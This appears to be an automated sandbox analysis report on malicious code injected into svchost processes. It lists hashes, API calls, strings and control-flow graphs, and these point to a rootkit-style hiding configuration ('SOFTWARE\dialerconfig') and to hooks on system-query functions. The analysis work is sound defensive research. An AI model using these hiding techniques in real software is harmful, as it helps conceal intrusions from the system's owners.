                                                        • Snapshot File: hcaresult_45_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID: \\.\pipe\
                                                        • API String ID: 3081899298-91387939
                                                        • Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                        • Instruction ID: a2f76bc1a186076cee4736489c3d4438f40eba79840f7ba633a66ebf323134d9
                                                        • Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                        • Instruction Fuzzy Hash: EA51C43220478182FFB4DB2AA45C3AEBB91F3D5780F450125DE5A27B99DA3BC585CF42
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002D.00000002.3136771059.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_45_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: ErrorFileLastWrite
                                                        • String ID: U
                                                        • API String ID: 442123175-4171548499
                                                        • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                        • Instruction ID: 5c34eae6179e8718e065711947d23fa5df45d25b207243dff04b03615aa00afe
                                                        • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                        • Instruction Fuzzy Hash: 8541A433715A8086DBA0DF25E8483ADBFA1F798794F944021EE4D97794EB7DC441CB41
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002D.00000002.3136771059.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_45_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFileHeaderRaise
                                                        • String ID: csm
                                                        • API String ID: 2573137834-1018135373
                                                        • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                        • Instruction ID: 516278ab517d9276ea0f4953800809262020678c9f6335137ecd7ce881f65308
                                                        • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                        • Instruction Fuzzy Hash: 3D112836214B8082EBA18B15E44835DBBE5FB99BA4F584225EF8C17B68DF3DC551CB00
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002D.00000002.3136240029.0000026A87990000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A87990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_45_2_26a87990000_svchost.jbxd
                                                        Similarity
                                                        • API ID: __std_exception_copy
                                                        • String ID: ierarchy Descriptor'$riptor at (
                                                        • API String ID: 592178966-758928094
                                                        • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                        • Instruction ID: 290368697319c93d0959a6d4aceff4e73c937a6d0c9df6ff90baa51795892e9d
                                                        • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                        • Instruction Fuzzy Hash: CFE08671741B4490DF418F21E88469C73A1DBA8B64F889122995C1B311FA38D1E9C702
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002D.00000002.3136240029.0000026A87990000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A87990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_45_2_26a87990000_svchost.jbxd
                                                        Similarity
                                                        • API ID: __std_exception_copy
                                                        • String ID: Locator'$riptor at (
                                                        • API String ID: 592178966-4215709766
                                                        • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                        • Instruction ID: 57ea791ecea9af06e65d832b1adcba3d40aeefbf742ffe7567ba952dade77035
                                                        • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                        • Instruction Fuzzy Hash: 19E08671701B4490DF418F21E48069C7361E7A8B54F889122C94C1B311EA38D1E5C701
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000002D.00000002.3136771059.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_45_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocFree
                                                        • String ID:
                                                        • API String ID: 756756679-0
                                                        • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                        • Instruction ID: 7016fa5795a79e5502fdc21d921c24760b1a256b601511705076004f3255fffb
                                                        • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                        • Instruction Fuzzy Hash: A8119175641B4482EE94DF66A40C22D7BA1FBCAFC0F184025EE4D63766EF3AC442C741
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000002D.00000002.3136771059.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_45_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$AllocProcess
                                                        • String ID:
                                                        • API String ID: 1617791916-0
                                                        • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                        • Instruction ID: b1c6b37d2b3670007f77e6ad3635e51a98d0f2eb219863f2620388776d6560d5
                                                        • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                        • Instruction Fuzzy Hash: 08E06D3560160486EB44CFA2D80C34E3EE1FB8AF86F04C024C90907351DF7EC499CB51

                                                        Execution Graph

                                                        Execution Coverage: 0.8%
                                                        Dynamic/Decrypted Code Coverage: 0%
                                                        Signature Coverage: 0%
                                                        Total number of Nodes: 471
                                                        Total number of Limit Nodes: 3
15443 179537b04b5 15442->15443 15444 179537ac85f 15442->15444 15443->15444 15445 179537aecf0 _invalid_parameter_noinfo 15 API calls 15443->15445 15444->15383 15445->15444 15447 179537ac6ff 15446->15447 15448 179537ac6f5 15446->15448 15449 179537ad6ac __free_lconv_num 5 API calls 15447->15449 15448->15447 15453 179537ac71a 15448->15453 15450 179537ac706 15449->15450 15451 179537ad570 _invalid_parameter_noinfo 28 API calls 15450->15451 15452 179537ac712 15451->15452 15452->14984 15453->15452 15454 179537ad6ac __free_lconv_num 5 API calls 15453->15454 15454->15450 15456 179537ac26d 15455->15456 15460 179537ac225 15455->15460 15457 179537ac296 15456->15457 15458 179537ad744 __free_lconv_num 5 API calls 15456->15458 15459 179537ad744 __free_lconv_num 5 API calls 15457->15459 15458->15456 15459->15460 15460->14982 15461 1795377273c 15463 1795377276a 15461->15463 15462 17953772858 LoadLibraryA 15462->15463 15463->15462 15464 179537728d4 15463->15464 15465 179537a1abc 15470 179537a1628 GetProcessHeap 15465->15470 15467 179537a1ad2 Sleep SleepEx 15468 179537a1acb 15467->15468 15468->15467 15469 179537a1598 StrCmpIW StrCmpW 15468->15469 15469->15468 15471 179537a1648 _invalid_parameter_noinfo 15470->15471 15515 179537a1268 GetProcessHeap 15471->15515 15473 179537a1650 15474 179537a1268 2 API calls 15473->15474 15475 179537a1661 15474->15475 15476 179537a1268 2 API calls 15475->15476 15477 179537a166a 15476->15477 15478 179537a1268 2 API calls 15477->15478 15479 179537a1673 15478->15479 15480 179537a168e RegOpenKeyExW 15479->15480 15481 179537a18a6 15480->15481 15482 179537a16c0 RegOpenKeyExW 15480->15482 15481->15468 15483 179537a16e9 15482->15483 15484 179537a16ff RegOpenKeyExW 15482->15484 15519 179537a12bc RegQueryInfoKeyW 15483->15519 15485 179537a1723 15484->15485 15486 179537a173a RegOpenKeyExW 15484->15486 15530 179537a104c RegQueryInfoKeyW 15485->15530 15489 179537a1775 RegOpenKeyExW 15486->15489 15490 179537a175e 15486->15490 15494 179537a1799 15489->15494 15495 
179537a17b0 RegOpenKeyExW 15489->15495 15493 179537a12bc 13 API calls 15490->15493 15496 179537a176b RegCloseKey 15493->15496 15497 179537a12bc 13 API calls 15494->15497 15498 179537a17d4 15495->15498 15499 179537a17eb RegOpenKeyExW 15495->15499 15496->15489 15502 179537a17a6 RegCloseKey 15497->15502 15503 179537a12bc 13 API calls 15498->15503 15500 179537a1826 RegOpenKeyExW 15499->15500 15501 179537a180f 15499->15501 15505 179537a1861 RegOpenKeyExW 15500->15505 15506 179537a184a 15500->15506 15504 179537a104c 5 API calls 15501->15504 15502->15495 15507 179537a17e1 RegCloseKey 15503->15507 15508 179537a181c RegCloseKey 15504->15508 15510 179537a1885 15505->15510 15511 179537a189c RegCloseKey 15505->15511 15509 179537a104c 5 API calls 15506->15509 15507->15499 15508->15500 15512 179537a1857 RegCloseKey 15509->15512 15513 179537a104c 5 API calls 15510->15513 15511->15481 15512->15505 15514 179537a1892 RegCloseKey 15513->15514 15514->15511 15536 179537b6168 15515->15536 15517 179537a1283 GetProcessHeap 15518 179537a12ae _invalid_parameter_noinfo 15517->15518 15518->15473 15520 179537a1327 GetProcessHeap 15519->15520 15521 179537a148a RegCloseKey 15519->15521 15525 179537a133e _invalid_parameter_noinfo 15520->15525 15521->15484 15522 179537a1352 RegEnumValueW 15522->15525 15523 179537a1476 GetProcessHeap HeapFree 15523->15521 15525->15522 15525->15523 15526 179537a13d3 GetProcessHeap 15525->15526 15527 179537a141e lstrlenW GetProcessHeap 15525->15527 15528 179537a13f3 GetProcessHeap HeapFree 15525->15528 15529 179537a1443 StrCpyW 15525->15529 15537 179537a152c 15525->15537 15526->15525 15527->15525 15528->15527 15529->15525 15531 179537a11b5 RegCloseKey 15530->15531 15534 179537a10bf _invalid_parameter_noinfo 15530->15534 15531->15486 15532 179537a10cf RegEnumValueW 15532->15534 15533 179537a114e GetProcessHeap 15533->15534 15534->15531 15534->15532 15534->15533 15535 179537a116e GetProcessHeap HeapFree 15534->15535 15535->15534 15538 179537a157c 15537->15538 15541 
179537a1546 15537->15541 15538->15525 15539 179537a1565 StrCmpW 15539->15541 15540 179537a155d StrCmpIW 15540->15541 15541->15538 15541->15539 15541->15540

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000002E.00000002.3134958889.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_46_2_179537a0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$AllocProcess
                                                        • String ID:
                                                        • API String ID: 1617791916-0
                                                        • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                        • Instruction ID: e4bf16918a7cacbca0db979268ad85abf1fead3538016a29a4f8caa0c503e4bd
                                                        • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                        • Instruction Fuzzy Hash: 6AE06D35A0161886EB058F62D82838A37F1FB8AF0AF04C024CA8D47351EF7D8499C750

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000002E.00000002.3134958889.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_46_2_179537a0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: EnvironmentFreeStrings$Heap$AllocErrorLast
                                                        • String ID:
                                                        • API String ID: 3331406755-0
                                                        • Opcode ID: 987753ff894a599cb567346e89517f1ee9597d4cd7e0ed4d9062b173d8f816d4
                                                        • Instruction ID: e89af08d413403d6e5d7482309db2184f3715486d0e1cd70b0b3824db1cad727
                                                        • Opcode Fuzzy Hash: 987753ff894a599cb567346e89517f1ee9597d4cd7e0ed4d9062b173d8f816d4
                                                        • Instruction Fuzzy Hash: 4C31B431A6876081EA269F226C502DE77B4B786BD8F48422BEA9E43BC5DF38C5458704

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000002E.00000002.3134958889.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_46_2_179537a0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                        • String ID:
                                                        • API String ID: 1683269324-0
                                                        • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                        • Instruction ID: ca808a076cef636c667c28671c52d662c11ceeea05346f25545d2e4f9369c430
                                                        • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                        • Instruction Fuzzy Hash: 5F116130E3C66482FB629FB1F8557D923B4E76A34DF544127DA4E42B91EF78C04C8610

                                                        Control-flow Graph

                                                        APIs
                                                          • Part of subcall function 00000179537A1628: GetProcessHeap.KERNEL32 ref: 00000179537A1633
                                                          • Part of subcall function 00000179537A1628: HeapAlloc.KERNEL32 ref: 00000179537A1642
                                                          • Part of subcall function 00000179537A1628: RegOpenKeyExW.ADVAPI32 ref: 00000179537A16B2
                                                          • Part of subcall function 00000179537A1628: RegOpenKeyExW.ADVAPI32 ref: 00000179537A16DF
                                                          • Part of subcall function 00000179537A1628: RegCloseKey.ADVAPI32 ref: 00000179537A16F9
                                                          • Part of subcall function 00000179537A1628: RegOpenKeyExW.ADVAPI32 ref: 00000179537A1719
                                                          • Part of subcall function 00000179537A1628: RegCloseKey.ADVAPI32 ref: 00000179537A1734
                                                          • Part of subcall function 00000179537A1628: RegOpenKeyExW.ADVAPI32 ref: 00000179537A1754
                                                          • Part of subcall function 00000179537A1628: RegCloseKey.ADVAPI32 ref: 00000179537A176F
                                                          • Part of subcall function 00000179537A1628: RegOpenKeyExW.ADVAPI32 ref: 00000179537A178F
                                                          • Part of subcall function 00000179537A1628: RegCloseKey.ADVAPI32 ref: 00000179537A17AA
                                                          • Part of subcall function 00000179537A1628: RegOpenKeyExW.ADVAPI32 ref: 00000179537A17CA
                                                        • Sleep.KERNEL32 ref: 00000179537A1AD7
                                                        • SleepEx.KERNELBASE ref: 00000179537A1ADD
                                                          • Part of subcall function 00000179537A1628: RegCloseKey.ADVAPI32 ref: 00000179537A17E5
                                                          • Part of subcall function 00000179537A1628: RegOpenKeyExW.ADVAPI32 ref: 00000179537A1805
                                                          • Part of subcall function 00000179537A1628: RegCloseKey.ADVAPI32 ref: 00000179537A1820
                                                          • Part of subcall function 00000179537A1628: RegOpenKeyExW.ADVAPI32 ref: 00000179537A1840
                                                          • Part of subcall function 00000179537A1628: RegCloseKey.ADVAPI32 ref: 00000179537A185B
                                                          • Part of subcall function 00000179537A1628: RegOpenKeyExW.ADVAPI32 ref: 00000179537A187B
                                                          • Part of subcall function 00000179537A1628: RegCloseKey.ADVAPI32 ref: 00000179537A1896
                                                          • Part of subcall function 00000179537A1628: RegCloseKey.ADVAPI32 ref: 00000179537A18A0
                                                        Memory Dump Source
                                                        • Source File: 0000002E.00000002.3134958889.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_46_2_179537a0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CloseOpen$HeapSleep$AllocProcess
                                                        • String ID:
                                                        • API String ID: 1534210851-0
                                                        • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                        • Instruction ID: b6c2e1d6c864596a4c04fdf18bbbf5071076cb135f023add6302ffefab344da2
                                                        • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                        • Instruction Fuzzy Hash: 04313271F2866582FF529B36DA413E923F4AB46BC8F8854239E0D873D5FF24C859C610

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 89 179537a3844-179537a384f 90 179537a3851-179537a3864 StrCmpNIW 89->90 91 179537a3869-179537a3870 89->91 90->91 92 179537a3866 90->92 92->91
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002E.00000002.3134958889.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_46_2_179537a0000_svchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: dialer
                                                        • API String ID: 0-3528709123
                                                        • Opcode ID: 65427932a6511f3c8dca5889eed1792e2f2e2d3e0b30565664b7cb78ea33e46c
                                                        • Instruction ID: dbbf6158d5080c7e4a12ec2d32b33ddd1bdad48742ffa41caff3c02827982d81
                                                        • Opcode Fuzzy Hash: 65427932a6511f3c8dca5889eed1792e2f2e2d3e0b30565664b7cb78ea33e46c
                                                        • Instruction Fuzzy Hash: 7AD0A770B252558BFF56DFE688D46E02370EB0974CF884032C90802750EB1CD98DA720

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 93 1795377273c-179537727a4 call 179537729d4 * 4 102 179537727aa-179537727ad 93->102 103 179537729b2 93->103 102->103 104 179537727b3-179537727b6 102->104 105 179537729b4-179537729d0 103->105 104->103 106 179537727bc-179537727bf 104->106 106->103 107 179537727c5-179537727e6 106->107 107->103 109 179537727ec-1795377280c 107->109 110 1795377280e-17953772836 109->110 111 17953772838-1795377283f 109->111 110->110 110->111 112 179537728df-179537728e6 111->112 113 17953772845-17953772852 111->113 115 179537728ec-17953772901 112->115 116 17953772992-179537729b0 112->116 113->112 114 17953772858-1795377286a LoadLibraryA 113->114 117 1795377286c-17953772878 114->117 118 179537728ca-179537728d2 114->118 115->116 119 17953772907 115->119 116->105 120 179537728c5-179537728c8 117->120 118->114 121 179537728d4-179537728d9 118->121 123 1795377290d-17953772921 119->123 120->118 124 1795377287a-1795377287d 120->124 121->112 125 17953772923-17953772934 123->125 126 17953772982-1795377298c 123->126 129 1795377287f-179537728a5 124->129 130 179537728a7-179537728b7 124->130 127 1795377293f-17953772943 125->127 128 17953772936-1795377293d 125->128 126->116 126->123 133 1795377294d-17953772951 127->133 134 17953772945-1795377294b 127->134 132 17953772970-17953772980 128->132 135 179537728ba-179537728c1 129->135 130->135 132->125 132->126 136 17953772963-17953772967 133->136 137 17953772953-17953772961 133->137 134->132 135->120 136->132 139 17953772969-1795377296c 136->139 137->132 139->132
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000002E.00000002.3134494005.0000017953770000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017953770000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_46_2_17953770000_svchost.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                        • Instruction ID: aa063f8f75c6740ade699a4d29bdcc33ceee5f26798b0015945cd0de14dc5192
                                                        • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                        • Instruction Fuzzy Hash: E6613532F096A087DB56CF15D0007ADB3F2F756BA8F188122CE6D17788DA38D866DB00

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 399 179537a2b2c-179537a2ba5 call 179537c2ce0 402 179537a2bab-179537a2bb1 399->402 403 179537a2ee0-179537a2f03 399->403 402->403 404 179537a2bb7-179537a2bba 402->404 404->403 405 179537a2bc0-179537a2bc3 404->405 405->403 406 179537a2bc9-179537a2bd9 GetModuleHandleA 405->406 407 179537a2bdb-179537a2beb call 179537b6090 406->407 408 179537a2bed 406->408 409 179537a2bf0-179537a2c0e 407->409 408->409 409->403 413 179537a2c14-179537a2c33 StrCmpNIW 409->413 413->403 414 179537a2c39-179537a2c3d 413->414 414->403 415 179537a2c43-179537a2c4d 414->415 415->403 416 179537a2c53-179537a2c5a 415->416 416->403 417 179537a2c60-179537a2c73 416->417 418 179537a2c83 417->418 419 179537a2c75-179537a2c81 417->419 420 179537a2c86-179537a2c8a 418->420 419->420 421 179537a2c8c-179537a2c98 420->421 422 179537a2c9a 420->422 423 179537a2c9d-179537a2ca7 421->423 422->423 424 179537a2d9d-179537a2da1 423->424 425 179537a2cad-179537a2cb0 423->425 428 179537a2ed2-179537a2eda 424->428 429 179537a2da7-179537a2daa 424->429 426 179537a2cc2-179537a2ccc 425->426 427 179537a2cb2-179537a2cbf call 179537a199c 425->427 431 179537a2d00-179537a2d0a 426->431 432 179537a2cce-179537a2cdb 426->432 427->426 428->403 428->417 433 179537a2dbb-179537a2dc5 429->433 434 179537a2dac-179537a2db8 call 179537a199c 429->434 439 179537a2d0c-179537a2d19 431->439 440 179537a2d3a-179537a2d3d 431->440 432->431 438 179537a2cdd-179537a2cea 432->438 435 179537a2dc7-179537a2dd4 433->435 436 179537a2df5-179537a2df8 433->436 434->433 435->436 442 179537a2dd6-179537a2de3 435->442 443 179537a2e05-179537a2e12 lstrlenW 436->443 444 179537a2dfa-179537a2e03 call 179537a1bbc 436->444 445 179537a2ced-179537a2cf3 438->445 439->440 446 179537a2d1b-179537a2d28 439->446 447 179537a2d4b-179537a2d58 lstrlenW 440->447 448 179537a2d3f-179537a2d49 call 179537a1bbc 440->448 450 179537a2de6-179537a2dec 442->450 456 179537a2e14-179537a2e1e 443->456 457 179537a2e35-179537a2e3f call 
179537a3844 443->457 444->443 461 179537a2e4a-179537a2e55 444->461 454 179537a2d93-179537a2d98 445->454 455 179537a2cf9-179537a2cfe 445->455 458 179537a2d2b-179537a2d31 446->458 451 179537a2d7b-179537a2d8d call 179537a3844 447->451 452 179537a2d5a-179537a2d64 447->452 448->447 448->454 450->461 462 179537a2dee-179537a2df3 450->462 451->454 466 179537a2e42-179537a2e44 451->466 452->451 463 179537a2d66-179537a2d79 call 179537a152c 452->463 454->466 455->431 455->445 456->457 467 179537a2e20-179537a2e33 call 179537a152c 456->467 457->466 458->454 468 179537a2d33-179537a2d38 458->468 470 179537a2e57-179537a2e5b 461->470 471 179537a2ecc-179537a2ed0 461->471 462->436 462->450 463->451 463->454 466->428 466->461 467->457 467->461 468->440 468->458 476 179537a2e63-179537a2e7d call 179537a85c0 470->476 477 179537a2e5d-179537a2e61 470->477 471->428 480 179537a2e80-179537a2e83 476->480 477->476 477->480 483 179537a2e85-179537a2ea3 call 179537a85c0 480->483 484 179537a2ea6-179537a2ea9 480->484 483->484 484->471 486 179537a2eab-179537a2ec9 call 179537a85c0 484->486 486->471
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002E.00000002.3134958889.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_46_2_179537a0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                        • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                        • API String ID: 2119608203-3850299575
                                                        • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                        • Instruction ID: a68df60460c540e5a9242f56c6b8bfc5263ec75fa9e1868138209c41af1d70d8
                                                        • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                        • Instruction Fuzzy Hash: 0BB1BF72A28AA092EB6A8F25C4447E963B5F74AB8CF445017EE4D53B95EF35CCC8C740
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000002E.00000002.3134958889.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_46_2_179537a0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                        • String ID:
                                                        • API String ID: 3140674995-0
                                                        • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                        • Instruction ID: 58b78ca673e8f1c025eb56569f683145776f8da21aff7224e17a305cb7f8da99
                                                        • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                        • Instruction Fuzzy Hash: FC317072619B908AEB619F60E8503EE7371F785748F44402ADB8D57B94EF38C54CC714
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000002E.00000002.3134958889.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_46_2_179537a0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                        • String ID:
                                                        • API String ID: 1239891234-0
                                                        • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                        • Instruction ID: fac0d66ec64c3925cbc38e830e94581c1ed51f6a25e90594bb5b961479521937
                                                        • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                        • Instruction Fuzzy Hash: C8315F32618B9096EB61CF25E8503DE73B4F78A758F540126EA9D53B94EF38C659CB00

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002E.00000002.3134958889.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_46_2_179537a0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                        • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                        • API String ID: 106492572-2879589442
                                                        • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                        • Instruction ID: 206c1a27e464331c4bd0b9a092aeafa2340499ab111ab09f1a96645441c587cd
                                                        • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                        • Instruction Fuzzy Hash: A371F136B18A2485FB11AF66E8A0ADD3374F786B8CF401122DE4E57B69EF38C548C744

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002E.00000002.3134958889.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_46_2_179537a0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                        • String ID: d
                                                        • API String ID: 2005889112-2564639436
                                                        • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                        • Instruction ID: 6227fafc9fbf8ae47cd58b7f6cf4b5d99e6e7defb89df161162dad1074e44a04
                                                        • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                        • Instruction Fuzzy Hash: 83517C72A18B9886EB51CF66E45839A77B1F38AF89F444126DE8D47718EF3CC049CB00

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002E.00000002.3134958889.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_46_2_179537a0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentThread$AddressHandleModuleProc
                                                        • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                        • API String ID: 4175298099-1975688563
                                                        • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                        • Instruction ID: ba4581b48e2ff6b855cacc301ebdcd167c7a3886c66976a807292e1e89fccdae
                                                        • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                        • Instruction Fuzzy Hash: AF315074E299AAA0FE17EF65E8616D46371B70634CFC05023D84D13766AE7C868EC750

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002E.00000002.3134494005.0000017953770000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017953770000, based on PE: true
                                                        Joe Sandbox IDA Plugin
